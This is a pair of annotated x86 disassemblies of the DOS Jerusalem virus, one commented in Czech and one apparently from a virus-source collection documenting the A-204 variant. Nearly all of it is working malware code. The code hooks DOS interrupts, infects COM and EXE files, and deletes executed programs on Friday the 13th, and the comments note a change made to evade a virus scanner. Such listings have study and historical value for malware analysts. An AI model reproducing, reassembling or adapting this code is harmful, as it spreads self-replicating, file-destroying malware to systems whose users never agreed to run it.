45BD:0121 26C606FE03CB MOV Byte Ptr ES:[03FE],CB
45BD:0127 58 POP AX
45BD:0128 051000 ADD AX,0010
45BD:012B 8EC0 MOV ES,AX
45BD:012D 0E PUSH CS
45BD:012E 1F POP DS
45BD:012F B91007 MOV CX,0710
45BD:0132 D1E9 SHR CX,1
45BD:0134 33F6 XOR SI,SI
45BD:0136 8BFE MOV DI,SI
45BD:0138 06 PUSH ES
45BD:0139 B84201 MOV AX,0142
45BD:013C 50 PUSH AX
45BD:013D EAFC030000 JMP 0000:03FC ;========================
45BD:0142 8CC8 MOV AX,CS ; Po skoku pokracujeme
45BD:0144 8ED0 MOV SS,AX ; na 45BD:142
45BD:0146 BC0007 MOV SP,0700
45BD:0149 33C0 XOR AX,AX ;========================
45BD:014B 8ED8 MOV DS,AX ;
45BD:014D 2EA14B00 MOV AX,CS:[004B] ; Obnoveni puvodni hodno-
45BD:0151 A3FC03 MOV [03FC],AX ; ty preruseni 255.
45BD:0154 2EA04D00 MOV AL,CS:[004D]
45BD:0158 A2FE03 MOV [03FE],AL
45BD:015B 8BDC MOV BX,SP ; Velikost programu v
45BD:015D B104 MOV CL,04 ; paragrafech.
45BD:015F D3EB SHR BX,CL
45BD:0161 83C310 ADD BX,+10
45BD:0164 2E891E3300 MOV CS:[0033],BX ; Zmen velikost alokovane
45BD:0169 B44A MOV AH,4A ; pameti.
45BD:016B 2E8E063100 MOV ES,CS:[0031] ;
45BD:0170 CD21 INT 21 ;========================
45BD:0172 B82135 MOV AX,3521 ; Cti preruseni 21H.
45BD:0175 CD21 INT 21 ;
45BD:0177 2E891E1700 MOV CS:[0017],BX ;
45BD:017C 2E8C061900 MOV CS:[0019],ES ;========================
45BD:0181 0E PUSH CS
45BD:0182 1F POP DS
45BD:0183 BA5B02 MOV DX,025B ; Definice noveho vektoru
45BD:0186 B82125 MOV AX,2521 ; preruseni 21H.
45BD:0189 CD21 INT 21 ;========================
45BD:018B 8E063100 MOV ES,[0031]
45BD:018F 268E062C00 MOV ES,ES:[002C]
45BD:0194 33FF XOR DI,DI
45BD:0196 B9FF7F MOV CX,7FFF
45BD:0199 32C0 XOR AL,AL
45BD:019B F2 REPNZ
45BD:019C AE SCASB
45BD:019D 263805 CMP ES:[DI],AL
45BD:01A0 E0F9 LOOPNZ 019B
45BD:01A2 8BD7 MOV DX,DI
45BD:01A4 83C203 ADD DX,+03
45BD:01A7 B8004B MOV AX,4B00
45BD:01AA 06 PUSH ES
45BD:01AB 1F POP DS
45BD:01AC 0E PUSH CS
45BD:01AD 07 POP ES
45BD:01AE BB3500 MOV BX,0035
45BD:01B1 1E PUSH DS
45BD:01B2 06 PUSH ES
45BD:01B3 50 PUSH AX
45BD:01B4 53 PUSH BX
45BD:01B5 51 PUSH CX
45BD:01B6 52 PUSH DX
45BD:01B7 B42A MOV AH,2A ; DATUM
45BD:01B9 CD21 INT 21 ;======================
45BD:01BB 2EC6060E0000 MOV Byte Ptr CS:[000E],00
45BD:01C1 81F9C307 CMP CX,07C3 ; Virus se nemnozi roku
45BD:01C5 7430 JZ 01F7 ; 1987, v patek 13 maze
45BD:01C7 3C05 CMP AL,05 ; spustene soubory.
45BD:01C9 750D JNZ 01D8
45BD:01CB 80FA0D CMP DL,0D
45BD:01CE 7508 JNZ 01D8
45BD:01D0 2EFE060E00 INC Byte Ptr CS:[000E]
45BD:01D5 EB20 JMP 01F7
45BD:01D7 90 NOP
45BD:01D8 B80835 MOV AX,3508 ;=======================
45BD:01DB CD21 INT 21 ; Redefinice preruseni
45BD:01DD 2E891E1300 MOV CS:[0013],BX ; 08.
45BD:01E2 2E8C061500 MOV CS:[0015],ES
45BD:01E7 0E PUSH CS
45BD:01E8 1F POP DS
45BD:01E9 C7061F00907E MOV Word Ptr [001F],7E90
45BD:01EF B80825 MOV AX,2508
45BD:01F2 BA1E02 MOV DX,021E ;
45BD:01F5 CD21 INT 21 ;=======================
45BD:01F7 5A POP DX
45BD:01F8 59 POP CX
45BD:01F9 5B POP BX
45BD:01FA 58 POP AX
45BD:01FB 07 POP ES
45BD:01FC 1F POP DS
45BD:01FD 9C PUSHF
45BD:01FE 2EFF1E1700 CALL FAR CS:[0017] ; LOAD AND EXECUTE.
45BD:0203 1E PUSH DS ;
45BD:0204 07 POP ES
45BD:0205 B449 MOV AH,49
45BD:0207 CD21 INT 21
45BD:0209 B44D MOV AH,4D
45BD:020B CD21 INT 21
45BD:020D B431 MOV AH,31
45BD:020F BA0006 MOV DX,0600
45BD:0212 B104 MOV CL,04
45BD:0214 D3EA SHR DX,CL
45BD:0216 83C210 ADD DX,+10
45BD:0219 CD21 INT 21
45BD:021B 32C0 XOR AL,AL
45BD:021D CF IRET
;
;=======================================================================
; OBSLUHA PRERUSENI 08.
;
45BD:021E 2E833E1F0002 CMP Word Ptr CS:[001F],+02
45BD:0224 7517 JNZ 023D
45BD:0226 50 PUSH AX
45BD:0227 53 PUSH BX
45BD:0228 51 PUSH CX
45BD:0229 52 PUSH DX
45BD:022A 55 PUSH BP
45BD:022B B80206 MOV AX,0602
45BD:022E B787 MOV BH,87
45BD:0230 B90505 MOV CX,0505
45BD:0233 BA1010 MOV DX,1010
45BD:0236 CD10 INT 10
45BD:0238 5D POP BP
45BD:0239 5A POP DX
45BD:023A 59 POP CX
45BD:023B 5B POP BX
45BD:023C 58 POP AX
45BD:023D 2EFF0E1F00 DEC Word Ptr CS:[001F]
45BD:0242 7512 JNZ 0256
45BD:0244 2EC7061F000100 MOV Word Ptr CS:[001F],0001
45BD:024B 50 PUSH AX
45BD:024C 51 PUSH CX
45BD:024D 56 PUSH SI
45BD:024E B90140 MOV CX,4001
45BD:0251 F3 REPZ
45BD:0252 AC LODSB
45BD:0253 5E POP SI
45BD:0254 59 POP CX
45BD:0255 58 POP AX
45BD:0256 2EFF2E1300 JMP FAR CS:[0013]
;
;=======================================================================
; OBSLUHA PRERUSENI 21H.
;
45BD:025B 9C PUSHF
45BD:025C 80FCE0 CMP AH,E0
45BD:025F 7505 JNZ 0266
45BD:0261 B80003 MOV AX,0300 ; Test pritomnosti.
45BD:0264 9D POPF ;
45BD:0265 CF IRET ;==========================
45BD:0266 80FCDD CMP AH,DD ;
45BD:0269 7413 JZ 027E
45BD:026B 80FCDE CMP AH,DE
45BD:026E 7428 JZ 0298
45BD:0270 3D004B CMP AX,4B00 ; LOAD AND EXECUTE.
45BD:0273 7503 JNZ 0278
45BD:0275 E9B400 JMP 032C
45BD:0278 9D POPF
45BD:0279 2EFF2E1700 JMP FAR CS:[0017] ; Puvodni obsluha.
;==============================================
45BD:027E 58 POP AX ; Obsluha kodu 0DDH.
45BD:027F 58 POP AX
45BD:0280 B80001 MOV AX,0100
45BD:0283 2EA30A00 MOV CS:[000A],AX
45BD:0287 58 POP AX
45BD:0288 2EA30C00 MOV CS:[000C],AX
45BD:028C F3 REPZ
45BD:028D A4 MOVSB
45BD:028E 9D POPF
45BD:028F 2EA10F00 MOV AX,CS:[000F]
45BD:0293 2EFF2E0A00 JMP FAR CS:[000A]
;==============================================
45BD:0298 83C406 ADD SP,+06 ; Obsluha kodu 0DEH.
45BD:029B 9D POPF
45BD:029C 8CC8 MOV AX,CS
45BD:029E 8ED0 MOV SS,AX
45BD:02A0 BC1007 MOV SP,0710
45BD:02A3 06 PUSH ES
45BD:02A4 06 PUSH ES
45BD:02A5 33FF XOR DI,DI
45BD:02A7 0E PUSH CS
45BD:02A8 07 POP ES
45BD:02A9 B91000 MOV CX,0010
45BD:02AC 8BF3 MOV SI,BX
45BD:02AE BF2100 MOV DI,0021
45BD:02B1 F3 REPZ
45BD:02B2 A4 MOVSB
45BD:02B3 8CD8 MOV AX,DS
45BD:02B5 8EC0 MOV ES,AX
45BD:02B7 2EF7267A00 MUL Word Ptr CS:[007A]
45BD:02BC 2E03062B00 ADD AX,CS:[002B]
45BD:02C1 83D200 ADC DX,+00
45BD:02C4 2EF7367A00 DIV Word Ptr CS:[007A]
45BD:02C9 8ED8 MOV DS,AX
45BD:02CB 8BF2 MOV SI,DX
45BD:02CD 8BFA MOV DI,DX
45BD:02CF 8CC5 MOV BP,ES
45BD:02D1 2E8B1E2F00 MOV BX,CS:[002F]
45BD:02D6 0BDB OR BX,BX
45BD:02D8 7413 JZ 02ED
45BD:02DA B90080 MOV CX,8000
45BD:02DD F3 REPZ
45BD:02DE A5 MOVSW
45BD:02DF 050010 ADD AX,1000
45BD:02E2 81C50010 ADD BP,1000
45BD:02E6 8ED8 MOV DS,AX
45BD:02E8 8EC5 MOV ES,BP
45BD:02EA 4B DEC BX
45BD:02EB 75ED JNZ 02DA
45BD:02ED 2E8B0E2D00 MOV CX,CS:[002D]
45BD:02F2 F3 REPZ
45BD:02F3 A4 MOVSB
45BD:02F4 58 POP AX
45BD:02F5 50 PUSH AX
45BD:02F6 051000 ADD AX,0010
45BD:02F9 2E01062900 ADD CS:[0029],AX
45BD:02FE 2E01062500 ADD CS:[0025],AX
45BD:0303 2EA12100 MOV AX,CS:[0021]
45BD:0307 1F POP DS
45BD:0308 07 POP ES
45BD:0309 2E8E162900 MOV SS,CS:[0029]
45BD:030E 2E8B262700 MOV SP,CS:[0027]
45BD:0313 2EFF2E2300 JMP FAR CS:[0023]
;==============================================
45BD:0318 33C9 XOR CX,CX ; Vymazani souboru.
45BD:031A B80143 MOV AX,4301 ; Zmen atributy souboru.
45BD:031D CD21 INT 21 ;
45BD:031F B441 MOV AH,41 ; Vymaz
45BD:0321 CD21 INT 21
45BD:0323 B8004B MOV AX,4B00 ; a vykonej.
45BD:0326 9D POPF
45BD:0327 2EFF2E1700 JMP FAR CS:[0017] ; FUNGUJE v patek 13.
;==============================================
45BD:032C 2E803E0E0001 CMP Byte Ptr CS:[000E],01 ; LOAD & EXECUTE.
45BD:0332 74E4 JZ 0318
45BD:0334 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF
45BD:033B 2EC7068F000000 MOV Word Ptr CS:[008F],0000
45BD:0342 2E89168000 MOV CS:[0080],DX
45BD:0347 2E8C1E8200 MOV CS:[0082],DS
45BD:034C 50 PUSH AX
45BD:034D 53 PUSH BX
45BD:034E 51 PUSH CX
45BD:034F 52 PUSH DX
45BD:0350 56 PUSH SI
45BD:0351 57 PUSH DI
45BD:0352 1E PUSH DS
45BD:0353 06 PUSH ES
45BD:0354 FC CLD
45BD:0355 8BFA MOV DI,DX
45BD:0357 32D2 XOR DL,DL
45BD:0359 807D013A CMP Byte Ptr [DI+01],3A
45BD:035D 7505 JNZ 0364 ;
45BD:035F 8A15 MOV DL,[DI] ; Volny prostor na disku.
45BD:0361 80E21F AND DL,1F
45BD:0364 B436 MOV AH,36
45BD:0366 CD21 INT 21
45BD:0368 3DFFFF CMP AX,FFFF
45BD:036B 7503 JNZ 0370
45BD:036D E97702 JMP 05E7 ;==========================
45BD:0370 F7E3 MUL BX ; Vypocet volneho prostoru.
45BD:0372 F7E1 MUL CX
45BD:0374 0BD2 OR DX,DX
45BD:0376 7505 JNZ 037D
45BD:0378 3D1007 CMP AX,0710 ; Je dost mista na VIRUS?
45BD:037B 72F0 JB 036D
45BD:037D 2E8B168000 MOV DX,CS:[0080]
45BD:0382 1E PUSH DS
45BD:0383 07 POP ES
45BD:0384 32C0 XOR AL,AL
45BD:0386 B94100 MOV CX,0041
45BD:0389 F2 REPNZ ; Hledani konce retezce.
45BD:038A AE SCASB
45BD:038B 2E8B368000 MOV SI,CS:[0080]
45BD:0390 8A04 MOV AL,[SI]
45BD:0392 0AC0 OR AL,AL
45BD:0394 740E JZ 03A4
45BD:0396 3C61 CMP AL,61
45BD:0398 7207 JB 03A1
45BD:039A 3C7A CMP AL,7A
45BD:039C 7703 JA 03A1
45BD:039E 802C20 SUB Byte Ptr [SI],20
45BD:03A1 46 INC SI
45BD:03A2 EBEC JMP 0390
45BD:03A4 B90B00 MOV CX,000B
45BD:03A7 2BF1 SUB SI,CX
45BD:03A9 BF8400 MOV DI,0084
45BD:03AC 0E PUSH CS
45BD:03AD 07 POP ES
45BD:03AE B90B00 MOV CX,000B
45BD:03B1 F3 REPZ ; VIRUS neinfikuje
45BD:03B2 A6 CMPSB ; COMMAND.COM
45E3:03B3 7503 JNZ 03B8
45E3:03B5 E92F02 JMP 05E7
45E3:03B8 B80043 MOV AX,4300 ; Zjisti atributy
45E3:03BB CD21 INT 21 ; souboru.
45E3:03BD 7205 JB 03C4
45E3:03BF 2E890E7200 MOV CS:[0072],CX
45E3:03C4 7225 JB 03EB
45E3:03C6 32C0 XOR AL,AL
45E3:03C8 2EA24E00 MOV CS:[004E],AL
45E3:03CC 1E PUSH DS
45E3:03CD 07 POP ES
45E3:03CE 8BFA MOV DI,DX
45E3:03D0 B94100 MOV CX,0041
45E3:03D3 F2 REPNZ
45E3:03D4 AE SCASB
45E3:03D5 807DFE4D CMP Byte Ptr [DI-02],4D ; Rozeznani COM
45E3:03D9 740B JZ 03E6 ; a EXE souboru.
45E3:03DB 807DFE6D CMP Byte Ptr [DI-02],6D
45E3:03DF 7405 JZ 03E6
45E3:03E1 2EFE064E00 INC Byte Ptr CS:[004E]
45E3:03E6 B8003D MOV AX,3D00 ; Otevri soubor.
45E3:03E9 CD21 INT 21
45E3:03EB 725A JB 0447
45E3:03ED 2EA37000 MOV CS:[0070],AX
45E3:03F1 8BD8 MOV BX,AX
45E3:03F3 B80242 MOV AX,4202 ; Posun R/W pointer.
45E3:03F6 B9FFFF MOV CX,FFFF ; 5 byte od konce
45E3:03F9 BAFBFF MOV DX,FFFB ; souboru.
45E3:03FC CD21 INT 21 ;=====================
45E3:03FE 72EB JB 03EB
45E3:0400 050500 ADD AX,0005
45E3:0403 2EA31100 MOV CS:[0011],AX
45E3:0407 B90500 MOV CX,0005
45E3:040A BA6B00 MOV DX,006B ; Cti ze souboru
45E3:040D 8CC8 MOV AX,CS ; 5 byte (CS:6B)
45E3:040F 8ED8 MOV DS,AX
45E3:0411 8EC0 MOV ES,AX
45E3:0413 B43F MOV AH,3F
45E3:0415 CD21 INT 21
45E3:0417 8BFA MOV DI,DX
45E3:0419 BE0500 MOV SI,0005 ; Rozpoznavaci kod je
45E3:041C F3 REPZ ; MsDos.
45E3:041D A6 CMPSB
45E3:041E 7507 JNZ 0427
45E3:0420 B43E MOV AH,3E ; Soubor je nakazen.
45E3:0422 CD21 INT 21
45E3:0424 E9C001 JMP 05E7
45E3:0427 B82435 MOV AX,3524
45E3:042A CD21 INT 21
45E3:042C 891E1B00 MOV [001B],BX
45E3:0430 8C061D00 MOV [001D],ES
45E3:0434 BA1B02 MOV DX,021B
45E3:0437 B82425 MOV AX,2524
45E3:043A CD21 INT 21
45E3:043C C5168000 LDS DX,[0080]
45E3:0440 33C9 XOR CX,CX
45E3:0442 B80143 MOV AX,4301
45E3:0445 CD21 INT 21
45E3:0447 723B JB 0484
45E3:0449 2E8B1E7000 MOV BX,CS:[0070]
45E3:044E B43E MOV AH,3E
45E3:0450 CD21 INT 21
45E3:0452 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF
45E3:0459 B8023D MOV AX,3D02
45E3:045C CD21 INT 21
45E3:045E 7224 JB 0484
45E3:0460 2EA37000 MOV CS:[0070],AX
45E3:0464 8CC8 MOV AX,CS
45E3:0466 8ED8 MOV DS,AX
45E3:0468 8EC0 MOV ES,AX
45E3:046A 8B1E7000 MOV BX,[0070]
45E3:046E B80057 MOV AX,5700
45E3:0471 CD21 INT 21
45E3:0473 89167400 MOV [0074],DX
45E3:0477 890E7600 MOV [0076],CX
45E3:047B B80042 MOV AX,4200
45E3:047E 33C9 XOR CX,CX
45E3:0480 8BD1 MOV DX,CX
45E3:0482 CD21 INT 21
45E3:0484 723D JB 04C3
45E3:0486 803E4E0000 CMP Byte Ptr [004E],00
45E3:048B 7403 JZ 0490
45E3:048D EB57 JMP 04E6
45E3:048F 90 NOP
45E3:0490 BB0010 MOV BX,1000
45E3:0493 B448 MOV AH,48
45E3:0495 CD21 INT 21
45E3:0497 730B JNB 04A4
45E3:0499 B43E MOV AH,3E
45E3:049B 8B1E7000 MOV BX,[0070]
45E3:049F CD21 INT 21
45E3:04A1 E94301 JMP 05E7
45E3:04A4 FF068F00 INC Word Ptr [008F]
45E3:04A8 8EC0 MOV ES,AX
45E3:04AA 33F6 XOR SI,SI
45E3:04AC 8BFE MOV DI,SI
45E3:04AE B91007 MOV CX,0710
45E3:04B1 F3 REPZ
45E3:04B2 A4 MOVSB
45E3:04B3 8BD7 MOV DX,DI
45E3:04B5 8B0E1100 MOV CX,[0011]
45E3:04B9 8B1E7000 MOV BX,[0070]
45E3:04BD 06 PUSH ES
45E3:04BE 1F POP DS
45E3:04BF B43F MOV AH,3F
45E3:04C1 CD21 INT 21
45E3:04C3 721C JB 04E1
45E3:04C5 03F9 ADD DI,CX
45E3:04C7 33C9 XOR CX,CX
45E3:04C9 8BD1 MOV DX,CX
45E3:04CB B80042 MOV AX,4200
45E3:04CE CD21 INT 21
45E3:04D0 BE0500 MOV SI,0005
45E3:04D3 B90500 MOV CX,0005
45E3:04D6 F3 REPZ
45E3:04D7 2EA4 MOVSB CS:
45E3:04D9 8BCF MOV CX,DI
45E3:04DB 33D2 XOR DX,DX
45E3:04DD B440 MOV AH,40
45E3:04DF CD21 INT 21
45E3:04E1 720D JB 04F0
45E3:04E3 E9BC00 JMP 05A2
45E3:04E6 B91C00 MOV CX,001C
45E3:04E9 BA4F00 MOV DX,004F
45E3:04EC B43F MOV AH,3F
45E3:04EE CD21 INT 21
45E3:04F0 724A JB 053C
45E3:04F2 C70661008419 MOV Word Ptr [0061],1984
45E3:04F8 A15D00 MOV AX,[005D]
45E3:04FB A34500 MOV [0045],AX
45E3:04FE A15F00 MOV AX,[005F]
45E3:0501 A34300 MOV [0043],AX
45E3:0504 A16300 MOV AX,[0063]
45E3:0507 A34700 MOV [0047],AX
45E3:050A A16500 MOV AX,[0065]
45E3:050D A34900 MOV [0049],AX
45E3:0510 A15300 MOV AX,[0053]
45E3:0513 833E510000 CMP Word Ptr [0051],+00
45E3:0518 7401 JZ 051B
45E3:051A 48 DEC AX
45E3:051B F7267800 MUL Word Ptr [0078]
45E3:051F 03065100 ADD AX,[0051]
45E3:0523 83D200 ADC DX,+00
45E3:0526 050F00 ADD AX,000F
45E3:0529 83D200 ADC DX,+00
45E3:052C 25F0FF AND AX,FFF0
45E3:052F A37C00 MOV [007C],AX
45E3:0532 89167E00 MOV [007E],DX
45E3:0536 051007 ADD AX,0710
45E3:0539 83D200 ADC DX,+00
45E3:053C 723A JB 0578
45E3:053E F7367800 DIV Word Ptr [0078]
45E3:0542 0BD2 OR DX,DX
45E3:0544 7401 JZ 0547
45E3:0546 40 INC AX
45E3:0547 A35300 MOV [0053],AX
45E3:054A 89165100 MOV [0051],DX
45E3:054E A17C00 MOV AX,[007C]
45E3:0551 8B167E00 MOV DX,[007E]
45E3:0555 F7367A00 DIV Word Ptr [007A]
45E3:0559 2B065700 SUB AX,[0057]
45E3:055D A36500 MOV [0065],AX
45E3:0560 C7066300C500 MOV Word Ptr [0063],00C5
45E3:0566 A35D00 MOV [005D],AX
45E3:0569 C7065F001007 MOV Word Ptr [005F],0710
45E3:056F 33C9 XOR CX,CX
45E3:0571 8BD1 MOV DX,CX
45E3:0573 B80042 MOV AX,4200
45E3:0576 CD21 INT 21
45E3:0578 720A JB 0584
45E3:057A B91C00 MOV CX,001C
45E3:057D BA4F00 MOV DX,004F
45E3:0580 B440 MOV AH,40
45E3:0582 CD21 INT 21
45E3:0584 7211 JB 0597
45E3:0586 3BC1 CMP AX,CX
45E3:0588 7518 JNZ 05A2
45E3:058A 8B167C00 MOV DX,[007C]
45E3:058E 8B0E7E00 MOV CX,[007E]
45E3:0592 B80042 MOV AX,4200
45E3:0595 CD21 INT 21
45E3:0597 7209 JB 05A2
45E3:0599 33D2 XOR DX,DX
45E3:059B B91007 MOV CX,0710
45E3:059E B440 MOV AH,40
45E3:05A0 CD21 INT 21
45E3:05A2 2E833E8F0000 CMP Word Ptr CS:[008F],+00
45E3:05A8 7404 JZ 05AE
45E3:05AA B449 MOV AH,49
45E3:05AC CD21 INT 21
45E3:05AE 2E833E7000FF CMP Word Ptr CS:[0070],-01
45E3:05B4 7431 JZ 05E7
45E3:05B6 2E8B1E7000 MOV BX,CS:[0070]
45E3:05BB 2E8B167400 MOV DX,CS:[0074]
45E3:05C0 2E8B0E7600 MOV CX,CS:[0076]
45E3:05C5 B80157 MOV AX,5701
45E3:05C8 CD21 INT 21
45E3:05CA B43E MOV AH,3E
45E3:05CC CD21 INT 21
45E3:05CE 2EC5168000 LDS DX,CS:[0080]
45E3:05D3 2E8B0E7200 MOV CX,CS:[0072]
45E3:05D8 B80143 MOV AX,4301
45E3:05DB CD21 INT 21
45E3:05DD 2EC5161B00 LDS DX,CS:[001B]
45E3:05E2 B82425 MOV AX,2524
45E3:05E5 CD21 INT 21
45E3:05E7 07 POP ES
45E3:05E8 1F POP DS
45E3:05E9 5F POP DI
45E3:05EA 5E POP SI
45E3:05EB 5A POP DX
45E3:05EC 59 POP CX
45E3:05ED 5B POP BX
45E3:05EE 58 POP AX
45E3:05EF 9D POPF
45E3:05F0 2EFF2E1700 JMP FAR CS:[0017]
45E3:05F0 00 00 00-00 00 00 00 00 00 00 00 ...........
45E3:0600 F2 13 50 43 54 4F 4F 4C-53 2E 45 58 45 00 22 2F r.PCTOOLS.EXE."/
45E3:0610 01 FE 0D 00 8B 00 F0 F0-83 F2 F4 03 00 0F 00 00 .~....pp.rt.....
45E3:0620 4D FE 0D 04 00 45 43 3D-43 3A 5C 43 4F 4D 4D 41 M~...EC=C:\COMMA
45E3:0630 00 47 02 00 00 32 00 FF-FF FF FF FF FF FF FF FF .G...2..........
45E3:0640 FF FF FF FF FF FF FF FF-FF 43 3A 5C 5A 53 53 52 .........C:\ZSSR
45E3:0650 5C 4B 41 4C 49 42 52 5C-4B 41 49 4B 49 2E 42 41 \KALIBR\KAIKI.BA
45E3:0660 54 00 6B 61 69 6B 69 0D-00 FF FF FF 00 00 00 00 T.kaiki.........
45E3:0670 4D FE 0D 00 10 M~...
45E3:0670 00 00 00-00 00 00 00 00 00 00 00 ...........
45E3:0680 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 i..sUMsDos
MSDOS/J-Index/Virus.MSDOS.Unknown.j_a204.asm
+977
View File
@@ -0,0 +1,977 @@
Virus : Jerusalem Version B Variant A-204
Disassembled by : Righard Zwienenberg
Steenwijklaan 302
2541 RT The Hague
The Netherlands
Data : +31-70-3898822, V22,V22b,HST,MNP,CM
Voive : +31-70-3675379
FidoNet address : 2:512/2.3
Used Software : ASMGEN, DEBUG and D86-Disassembler
Date : 20 june 1990
Note : All Values are hex. If a value is followd by d (e.g. 30d) it means
30 decimal.
Note : This disassembly consists of two programs. The original program was
a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time
C3 RET.
0100 E9 92 00 JMP 0195 ; JUMP -> 0195h
0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used
010A dw 00 01 ; Startaddress original program
010C dw 01 56 ; Startaddress-offset original program
010E db 00 ; Trigger for destruction (delete file)
; Always zero, but if it is Friday the 13th and the year is
; not equal 1987 this byte is set to one
010F dw 00 00 ; Storing place for original AX (read-only word)
0111 dw 20 00 ; Length of Original Program (0020h)
0113 dw A5 FE ; Storing place for original BX of INT 08h vector
0115 dw 00 F0 ; Storing place for original ES of INT 08h vector
0117 dw 60 14 ; Storing place for original BX of INT 21h vector
0119 dw 2B 02 ; Storing place for original ES of INT 21h vector
011B dw 56 05 ; Storing place for original BX of INT 24h vector
011D dw DE 0C ; Storing place for original ES of INT 24h vector
011F dw 40 7E ; Storing place for timer for 30 minutes trigger
; By init. set to 7E90h
; The following words are never used by the virus. The are used
; by a routine starting at 0398h which is executed when INT 21h
; is called with AH=DEh. This never happens in the code.
0121 dw 00 00 ;
0123 dw 00 00 ;
0125 dw 00 00 ;
0127 dw 00 00 ;
0129 dw 00 00 ;
012B dw 00 00 ;
012D dw 00 E8 ;
012F dw 06 EC ;
0131 dw 91 16 ; Storing place for original ES
0133 dw 80 00 ; Storing place for BX. Never read again
0135 00 00 00 80 00
0139 dw 91 16 ; Storing place for original ES
013B 5C 00
013D dw 91 16 ; Storing place for original ES
013F 6C 00 ;
0141 dw 91 16 ; Temp. storing place for original ES
0143 dw 00 20 ; Temp. storing place for AX
0145 dw 0D 1F ; Temp. storing place for ES+10h
0147 dw 5F 21 ; Storing place for AX
0149 dw A1 16 ; Temp. storing place for ES+10h
014B dw 00 F0 ; Temp. storing place for AX
014D db 02 ; Temp. storing place for AL
014E db 00 ; COM/EXE indicator
; 0 = EXE-File
; 1 = COM-File
0151 dw 30 01 ; Temp. storing place for DX
0153 dw 23 00 ; Temp. storing place for AX
0155 20 01
0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it
; from AX
0159 D4 06 D4 06
015D dw 98 03 ; Temp. Storing place to store AX
015F dw 10 07 ; Probably startaddress of virus in mem
0161 dw 84 19 ; Never used!!! 1984h is stored here by the code
0163 dw C5 00 ; 00C5h is being read and put back later by the code
0165 dw 99 03 ; Temp. storing place for AX
0167 1C 00 00 00 90 90 90 90 C3
0170 dw 05 00 ; Storing place for file handle (BX)
0172 dw 20 00 ; Storing place for file attributes
; bit 0 = read only
; bit 1 = hidden file
; bit 2 = system file
; bit 3 = volume label
; bit 4 = subdirectory
; bit 5 = archive bit
; bit 8 = shareable (Novell Network)
0174 dw D5 14 ; Storing place for file date (DX)
0176 dw 99 83 ; Storing place for file time (CX)
0178 dw 00 02 ; 0200h=512d Used as multiplier/divider
017A dw 10 00 ; 0001h= 1d Used as multiplier/divider
017C dw 20 3E ; Temp. storing place for AX
017E dw 00 00 ; Temp. storing place for DX
0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename
0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename
0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM
; May not become infected
018F dw 01 00 ; Storing place for variable-result of free-memory-scan
; 0000h : not enough memory available
; 0001h : enough memory available
0191 00 00 00 00
0195 FC CLD ; Clear Direct
0196 B4 E0 MOV AH,0E0 ; This is the check if the
0198 CD 21 INT 021 ; virus is already active
; in memory. INT 21h with
; AH=E0h will return AX=0300h
; if the virus is active.
019A 80 FC E0 CMP AH,0E0 ; AH>=E0h?
019D 73 16 JAE 01B5 ; Yes: -> 01B5h
019F 80 FC 03 CMP AH,3 ; AH<-03h?
01A2 72 11 JB 01B5 ; Yes: -> 01B5h
; INT 21h with AH=
; DDh,DEh,E0h
; are self-defined.
; SetUp for
; Executing original program
; We come here if an infected
; program is executed and the
; virus is already active in
; memory.
01A4 B4 DD MOV AH,0DD ;
01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h
01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h
01AC 03 F7 ADD SI,DI ; Source Index:= 0810h
; At this place the original
; Program is located
01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original
; Program)
01B3 CD 21 INT 021 ;
; Here we come when the virus
; is not yet in memory
01B5 8C C8 MOV AX,CS ; AX=Code Segment
01B7 05 10 00 ADD AX,010 ; AX:=AX+10h
01BA 8E D0 MOV SS,AX ; Stack Segment:=AX
01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h
01BF 50 PUSH AX ; Store AX
01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h
01C3 50 PUSH AX ; Store AX
01C4 CB RETF ; -> C5h
01C5 FC CLD ; Clear Direct
01C6 06 PUSH ES ; Store ES
01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES
01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places
01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ;
01D6 2E 8C 06 41 00 CS MOV W[041],ES ;
01DB 8C C0 MOV AX,ES ; AX=ES
01DD 05 10 00 ADD AX,010 ; AX=AX+10h
01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX (ES+10h) to 0149h
01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h
01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined)
01EC CD 21 INT 021 ; CALL INT 21h
01EE 80 FC E0 CMP AH,0E0 ; AH>=0Eh?
01F1 73 13 JAE 0206 ; Yes: -> 0206
01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the
; viruscode is in memory
; and interrupt 21h is called
; with AH=E0h.
01F6 07 POP ES ; Restore original ES
01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h
01FC 2E 8B 26 43 00 CS MOV SP,W[043] ;
0201 2E FF 2E 47 00 CS JMP D[047] ;
0206 33 C0 XOR AX,AX ; AX=0000h
0208 8E C0 MOV ES,AX ; ES=0000h
020A 26 A1 FC 03 ES MOV AX,W[03FC]
; Here the A-204 variant
; differs for the first
; time from the original
; Jerusalem Version B virus.
020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two line have been
0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order
; to avoid being
; detected by ViruScan from
; John McAfee.
0216 2E A2 4D 00 CS MOV B[04D],AL
021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3
0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB
0227 58 POP AX
0228 05 10 00 ADD AX,010
022B 8E C0 MOV ES,AX
022D 0E PUSH CS ; Store CS
022E 1F POP DS ; DS=CS
022F B9 10 07 MOV CX,0710 ; CX=0710h
0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0308h)
0234 33 F6 XOR SI,SI ; SI=0000h
0236 8B FE MOV DI,SI ; DI=0000h
